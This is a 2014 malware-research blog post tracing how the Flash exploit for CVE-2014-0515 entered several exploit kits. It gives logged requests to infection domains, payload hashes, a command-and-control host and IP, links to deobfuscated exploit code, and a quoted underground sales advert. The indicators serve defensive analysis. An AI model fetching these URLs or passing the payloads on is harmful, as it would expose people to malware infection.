2014-06-07 - Exploit Integration

CVE-2014-0515 (Flash 13.0.0.182 and earlier) integrating Exploit Kits



Discovered by Kaspersky in April in watering hole attack, soon after used in operation targeting Banking information in Japan/Korea by Symantec, reached Exploit DB at begining of may, then in malwertising tied to Brazil 2014 by Spiderlabs, the code targeting CVE-2014-0515 (Flash 13.0.0.182 and earlier)  has find its way to Exploit Kits. I spotted it the 2014-06-05 in CottonCastle (blog post coming) exploit kit. Brad spotted it in Flash EK.

CottonCastle EK:

CVE-2014-0515 exploit in CottonCastle 2014-06-05
See Meet CottonCastle EK (confirmation credits for this CVE goes to Timo Hirvonen )

Flash EK: 2014-06-06 (decided to use coder's name)

The Flash EK coder announced the new exploit on underground the 2014-06-05.

"Добавлены новые сплоиты. Существенно поднялся пробив. С нашими впс и доменами - 350 уев в неделю. С вашими - 250. Битки или чек паймер. По английски не понимаю. Траф из СНГ не принимаем."

google translated as:

"Added new sploitov. Risen significantly breaking. With our EPS and domains - uev 350 per week. With your - 250. Chock or check paymer. By not understand English. Cores from the CIS do not accept."

Breaking increased by up to 45% of it's pre-CVE-2014-0515 value.

CVE-2014-0515 as spotted by Brad in Flash EK
2014-06-06
GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/allow.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/js/pd.php?id=6376652d323031342d303531352e636f6d  (6376652d323031342d303531352e636f6d is the referer in hex)
200 OK (text/html) http://pastebin.com/HdVf799r

Flash part of the JS detect in Flash EK
2014-06-06


POST http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/json.php
200 OK (text/html) http://pastebin.com/uhTTybKH


Post data to json
jspon.php Flash EK 2014-06-06
After unescape and hex2text : http://pastebin.com/4xZRjJLS
And after one more hex2text : http://pastebin.com/0F9Z2tiW

json.php after multiple hex2bin  Flash EK 2014-06-06


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/msie.php
200 OK (text/html)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash2014.php
200 OK (text/html) http://pastebin.com/mqXeun1g



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/flash0515.php
200 OK (text/html) http://pastebin.com/L6NYY0iW

After some deobfuscation (unescape, hex2text)  : http://pastebin.com/TjMyS6YW
After one more hex2text : http://pastebin.com/SVGS4yhD

After 3 hex2text : 0515php in Flash EK 2014-06-06



GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash) c49057333ebe34638e7908b43bd23f6c

CVE-2014-0515 DoSWF protected. (won't try to go further)


GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/include/4c3ce.swf
200 OK (application/x-shockwave-flash)

GET http://spciolv24hka0e790vwizgm.addirectory .org/tresting/avalonr/loadfla0515.php?id=4
200 OK (application/octet-stream)  bde9e91d8a9e19a45c9ebd44393c0194  Glupteba (Thanks Marc-Étienne Léveillé from Eset for identification. MS flagging it as Carberp made me wonder)

Files : 2014-06-06_CVE-2014-0515.zip
You'll find Pcap and additional Data on MalwareTrafficAnalysis

Sweet Orange :
Spotted by Brad on the 12th

CVE-2014-0515 successful pass in Sweet Orange
GET http://img.blueprint-legal .com:16122/systems/mysql/fedora.php?database=3
200 OK (text/html)

GET http://img.blueprint-legal .com:16122/systems/mysql/hxwXHAp
200 OK (application/x-shockwave-flash) 25844d337d3ee13ec411100cb2d2baf1

CVE-2014-0515 in Sweet Orange


GET http://img.lawandmarket .org:16122/cars.php?play=268
200 OK (application/octet-stream) d35d337ff7598bd6dc20c24e3be735bc (Qbot as usual for this user)

Files : Fiddler/Payload/Flash

Nuclear Pack:
2014-06-15
Exploit is inside (for instance : 444d411a353f6bd8209f91555dfd713b.


2014-06-18
After multiple try without being infected by this exploit on Flash 13.0.0.182 I finally got a "successful" pass. (Thanks Will Metcalf for Referer)

CVE-2014-0515 positive pass in Nuclear Pack


GET http://f42cb2bfvhf.venueat.gcwsa .org/
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.htm
200 OK (text/html)

GET http://737570439-1.venueat.gcwsa .org/1403061420.swf
200 OK (application/x-shockwave-flash) f95006970f34a6ca5bcd0b32b92dd48d

GET http://737570439-1.venueat.gcwsa .org/f/1403061420/7
200 OK (application/octet-stream) aa73557aa6b01045afe1b8b6a4aa0934 (Andromeda v09 rc4: 073e329fc4caff518ffb207eb3ac5859 - calling testotds.mcdir .ru - 91.194.254.180 )

Files : Fiddler/Payload/Flash

Angler EK:
2014-07-03
Modification spotted by EKWatcher. Exploit Identification by Kaspersky.

CVE-2014-0515 successful path in Angler EK
2014-07-03
GET http://reenslavementbuchungsbuero.izyday .com:5900/o0pmoexhbv.php
200 OK (text/html) Landing (Pastebin)

Contains some AV (Kaspersky and TrendMicro) detection :

AV detection
( Function0 
http://pastebin.com/hjH8ijuA )


SilverLight /Flash trigger

Moditication  spotted by EKWatcher
( Function1 : http://pastebin.com/H2DdDeVf )


And impossible path :

Impossible Path
( Function1 : http://pastebin.com/H2DdDeVf )

[OT] Silverlight Calls :  Function2  http://pastebin.com/Vd869rDX [/OT]

Flash Call (function3)

Flash Calls
Function3  http://pastebin.com/maY5Wz1X
 [OT]PluginDetect/Java calls : Function 4 http://pastebin.com/VbUsu2pv [/OT]



GET http://reenslavementbuchungsbuero.izyday .com:5900/9C52KmONbd2yuWAu5h6nA_qVLxrslXn927DBuIPEo2Pog7IUkVQt04rmOPmow_rb
200 OK (application/x-shockwave-flash) 85db431821dfec5d5d404b839c98d333


After decryption (Kaspersky's work)
Piece of CVE-2014-0515 in decrypted flash from Angler EK

GET http://reenslavementbuchungsbuero.izyday .com:5900/sVUXbUAgdGMB6xjbl128LfXoLjZ37iyD34sGV24h7-9RKadZHRBKohwCwk5FHCfc
200 OK (application/octet-stream) (Reveton Ransomware)

Files :
 Fiddler/Flash

Styx : 2014-08-22

Update coming shortly.


Read more :
CVE-2014-0515 exploit from FlashPack EK - Brad - Malware-Traffic-Analysis
CVE-2014-0515 Goes to Brazil for World Cup 2014 - Arseny Levin - SpiderLabs - 2014-06-03
Recent Exploit for Adobe Flash Vulnerability Targeting Users in Japan for Financial Information - Joji Hamada - Symantec - 2014-05-30
Technical Analysis of CVE-2014-0515 Adobe Flash Player Exploit - Matt_Oh - HP - 2014-05-23

EXPLOIT-KIT
CVE-2014-0515 Nuclear Pack CottonCastle EK Angler EK Flash EK Sweet Orange